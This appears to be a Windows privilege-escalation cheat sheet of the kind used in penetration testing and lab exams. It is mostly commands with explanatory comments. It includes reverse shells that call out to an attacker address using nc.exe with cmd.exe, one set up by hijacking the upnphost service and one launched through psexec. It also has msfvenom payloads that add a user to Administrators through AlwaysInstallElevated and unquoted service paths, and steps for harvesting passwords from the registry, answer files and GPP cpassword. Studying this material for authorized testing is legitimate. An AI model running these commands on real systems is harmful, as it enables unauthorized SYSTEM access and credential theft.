Priv Esc - Windows
Windows
Enumeration
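# basics
systeminfo
hostname
echo %username%
# token privileges and group membership: SeImpersonatePrivilege, SeBackupPrivilege,
# SeDebugPrivilege and similar are escalation paths on their own, so check them early
whoami /priv
whoami /groups
# users
net users
net user <username>
# network
ipconfig /all
route print
arp -A
netstat -ano # active network connections; -o adds the owning PID for each socket
# firewall status
# "netsh firewall" is the legacy (XP/2003) context and is deprecated on Vista and later;
# use the advfirewall context there
netsh firewall show state
netsh firewall show config
netsh advfirewall show allprofiles
# "show rule" needs an explicit name= argument - "show rule all" is a syntax error
netsh advfirewall firewall show rule name=all
# systeminfo output save in a file, check for vulnerabilities
systeminfo > systeminfo.txt
# windows-exploit-suggester is Python 2; run --update first to fetch the MSSB spreadsheet.
# Microsoft stopped publishing that bulletin feed in 2017, so hosts patched after that
# are not covered and every suggestion must still be checked against the installed KBs.
https://github.com/GDSSecurity/Windows-Exploit-Suggester/blob/master/windows-exploit-suggester.py
python windows-exploit-suggester.py --update
python windows-exploit-suggester.py -d 2017-05-27-mssb.xls -i systeminfo.txt
# Search patches for given patch (replace KB.. with the KB numbers an exploit is fixed by;
# a hit means the patch IS installed and that exploit will not work)
wmic qfe get Caption,Description,HotFixID,InstalledOn | findstr /C:"KB.." /C:"KB.."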
--------------------------------------
Kernel
# full output also lists "System Type" (x86/x64) and the installed hotfixes
systeminfo
systeminfo | findstr /B /C:"OS Name" /C:"OS Version"
# a kernel exploit must match both the build and the architecture, and is useless if the
# KB that fixes it is already in the hotfix list. Kernel exploits can also crash the host,
# so prefer the userland paths below when one exists.
# check for possible exploits, find a place to upload (eg: C:\Inetpub or C:\temp) it, run exe
# %TEMP% is almost always writable; confirm the chosen directory with icacls before uploading
--------------------------------------
Weak permissions
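# this example is for XP SP0
# upload accesschk.exe to a writable directory first
# for XP version 5.2 of accesschk.exe is needed
https://web.archive.org/web/20080530012252/http://live.sysinternals.com/accesschk.exe
# check for services with weak permissions
# -w lists only services the principal can write to; repeat for the other groups a
# low-privileged user belongs to (Everyone, Users), not just "Authenticated Users"
accesschk.exe -uwcqv "Authenticated Users" * /accepteula
accesschk.exe -uwcqv "Everyone" * /accepteula
accesschk.exe -uwcqv "Users" * /accepteula
# check for the found services above: SERVICE_CHANGE_CONFIG (or SERVICE_ALL_ACCESS)
# is the right that makes the "sc config" steps below succeed
accesschk.exe -ucqv upnphost
# record the original configuration so it can be restored afterwards
sc qc upnphost > upnphost.orig.txt
# upload nc.exe to writable directory
# note the mandatory space after "binpath=", "obj=" and "password=" (sc parses "key= value")
sc config upnphost binpath= "C:\Inetpub\nc.exe -nv <attackerip> 9988 -e C:\WINDOWS\System32\cmd.exe"
sc config upnphost obj= ".\LocalSystem" password= ""
# check the status now
sc qc upnphost
# upnphost depends on SSDPSRV, which must be running before upnphost can start
# change start option as AUTO-START
sc config SSDPSRV start= auto
#start the services
net start SSDPSRV
net stop upnphost
net start upnphost
# listen on port 9988 and you'll get a shell with NT AUTHORITY\SYSTEM privileges
# nc.exe is not a real service binary, so the SCM reports a start failure after its
# ~30 s timeout and the shell may die with it: act immediately (add a user, start a
# second listener, migrate) rather than relying on it staying up
# afterwards restore binpath/obj from upnphost.orig.txt so the service is not left broken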
--------------------------------------
Registry Checks for Passwords
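# search both hives for values whose name or data contains "password" (noisy but cheap)
reg query HKLM /f password /t REG_SZ /s
reg query HKCU /f password /t REG_SZ /s
# autologon: DefaultUserName / DefaultPassword / DefaultDomainName are stored in clear text here
reg query "HKLM\SOFTWARE\Microsoft\Windows NT\Currentversion\Winlogon"
# SNMP community strings live in subkeys (Parameters\ValidCommunities), so recurse with /s
reg query "HKLM\SYSTEM\CurrentControlSet\Services\SNMP" /s
# PuTTY: one subkey per saved session; proxy passwords are stored in clear text
reg query "HKCU\Software\SimonTatham\PuTTY\Sessions" /s
# RealVNC: the value is DES-obfuscated with a fixed, well-known key - trivially reversible
reg query HKEY_LOCAL_MACHINE\SOFTWARE\RealVNC\WinVNC4 /v password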
--------------------------------------
Places to Check for Credentials
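# sysprep / unattended-install answer files: look for <Password> / <AdministratorPassword>.
# When <PlainText>false</PlainText> the <Value> is base64 of the password with the word
# "Password" appended; older sysprep.inf files hold it in clear text.
C:\sysprep.inf
C:\sysprep\sysprep.xml
%WINDIR%\Panther\Unattend\Unattended.xml
%WINDIR%\Panther\Unattended.xml
%WINDIR%\Panther\Unattend.xml
%WINDIR%\Panther\Unattend\Unattend.xml
%WINDIR%\System32\sysprep\sysprep.inf
%WINDIR%\System32\sysprep\sysprep.xml
# "dir /s" only walks down from the current directory, so anchor the search at the
# drive root (repeat for other drives) or it silently misses most of the disk
dir /b /s C:\unattend.xml
# web.config: connectionStrings and appSettings often hold DB / service credentials
dir /b /s C:\web.config
dir /b /s C:\sysprep.inf
dir /b /s C:\sysprep.xml
dir /b /s C:\*pass*
dir /b /s C:\vnc.ini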
----------------------------
Groups.xml
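# Group Policy Preferences: any domain user can read SYSVOL, and GPP files created before
# MS14-025 store the account password as "cpassword", AES-encrypted with a key Microsoft
# published - effectively plaintext. MS14-025 stops new ones being created but does not
# remove files that are already there.
# Look up IP address of DC (%LOGONSERVER% names the DC that authenticated you)
echo %LOGONSERVER%
nslookup nameofserver.whatever.local
# It will output something like this
Address: 192.168.1.101
# Now we mount it (requires a domain login; any domain account will do)
net use z: \\192.168.1.101\SYSVOL
# And enter it
z:
# Now we search for the groups.xml file
dir Groups.xml /s
# cpassword is not limited to Groups.xml - Services.xml, ScheduledTasks.xml,
# DataSources.xml, Drives.xml and Printers.xml can carry it too - so grep every policy XML
findstr /S /I /M cpassword *.xml
# decrypt the password in it: <pass> is the value of the cpassword attribute;
# gpp-decrypt ships with Kali and is run on the attacker box, not on the target
gpp-decrypt <pass>
# drop the mapping when done
net use z: /delete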
-----------------------------
AlwaysInstallElevated
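# the policy only applies when AlwaysInstallElevated is 1 in BOTH hives; a missing
# value or 0 in either means msiexec will NOT run the package as SYSTEM
reg query HKLM\Software\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
reg query HKCU\Software\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
# From the output, notice that "AlwaysInstallElevated" value is 1 (0x1) in both hives.
# Exploitation: build an MSI whose custom action runs as SYSTEM. "user" below is the
# account to promote - replace it with your own username.
msfvenom -p windows/exec CMD='net localgroup administrators user /add' -f msi-nouac -o setup.msi
# Place 'setup.msi' in a directory you can write to, e.g. C:\Temp
# /quiet and /qn both mean "no UI"; the install itself typically reports failure
# after the command has run, which is expected - the group change persists
msiexec /quiet /qn /i C:\Temp\setup.msi
net localgroup Administrators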
---------------------------------
Find writable files
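# "writable" here only means the read-only ATTRIBUTE is clear. It says nothing about
# the ACL, so this both over-reports (attribute clear but the DACL denies you) and
# under-reports (read-only attribute set on a file you actually have write/delete rights to).
dir /a-r-d /s /b
# /a is to search for attributes. In this case r is read only and d is directory. (look for writable files only)
# /s means recurse subdirectories
# /b means bare format. Path and filename only.
# for real ACL-based results use accesschk (upload it to a writable directory first):
# -w = write access, -d = directories only, -s = recurse, -q = omit banner
accesschk.exe -uwdqs Users C:\ /accepteula
accesschk.exe -uwdqs "Authenticated Users" C:\ /accepteula
accesschk.exe -uwqs "Authenticated Users" C:\*.* /accepteula
# and icacls on any interesting path: look for (F), (M) or (W) granted to a group you are in
icacls "C:\Program Files"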
-----------------------------------
Unquoted Path
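# auto-start services whose binary path is unquoted and not under C:\Windows
wmic service get name,displayname,pathname,startmode |findstr /i "Auto" |findstr /i /v "C:\Windows\\" |findstr /i /v """
# Suppose we found: C:\Program Files (x86)\Program Folder\A Subfolder\Executable.exe
# Windows resolves an unquoted path by trying, in order:
#   C:\Program.exe
#   C:\Program Files (x86)\Program.exe
#   C:\Program Files (x86)\Program Folder\A.exe
#   C:\Program Files (x86)\Program Folder\A Subfolder\Executable.exe
# so the payload must be NAMED after the first word of the next segment (Program.exe or
# A.exe) and placed in the directory before it. C:\ and "Program Files" are normally not
# writable by standard users; a vendor's own folder often is.
# check for permissions of every folder along the path
icacls "C:\Program Files (x86)"
icacls "C:\Program Files (x86)\Program Folder"
# exploit ("user" is the account to promote; exe-service builds a binary that behaves
# like a service long enough for the SCM to run it instead of killing it)
msfvenom -p windows/exec CMD='net localgroup administrators user /add' -f exe-service -o A.exe
# Place A.exe in 'C:\Program Files (x86)\Program Folder' (or Program.exe in 'C:\Program Files (x86)'),
# i.e. wherever icacls showed you can write.
# Open command prompt and type (use the service NAME from the wmic output, not the display name;
# sc start needs SERVICE_START rights on the service - check with accesschk -ucqv - otherwise
# wait for or trigger a reboot, since the service is auto-start):
sc start unquotedsrvc
net localgroup Administrators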
-----------------------------------
# psexec using found credentials
# Sysinternals PsExec needs local-admin rights on the target and the ADMIN$ share
# reachable over 445/tcp; its documented usage puts \\MACHINENAME before -u/-p, so
# reorder if the parser complains. -p puts the password on the command line (visible
# in process listings and command-line logging); omit it and PsExec prompts for it
# instead. Add -s to run the command as SYSTEM, -c to copy a local binary to the
# target instead of uploading nc.exe by hand.
# first upload nc.exe to a writable directory
psexec.exe -u <username> -p <password> \\MACHINENAME C:\Inetpub\nc.exe <attackerip> <attackerport> -e C:\windows\system32\cmd.exe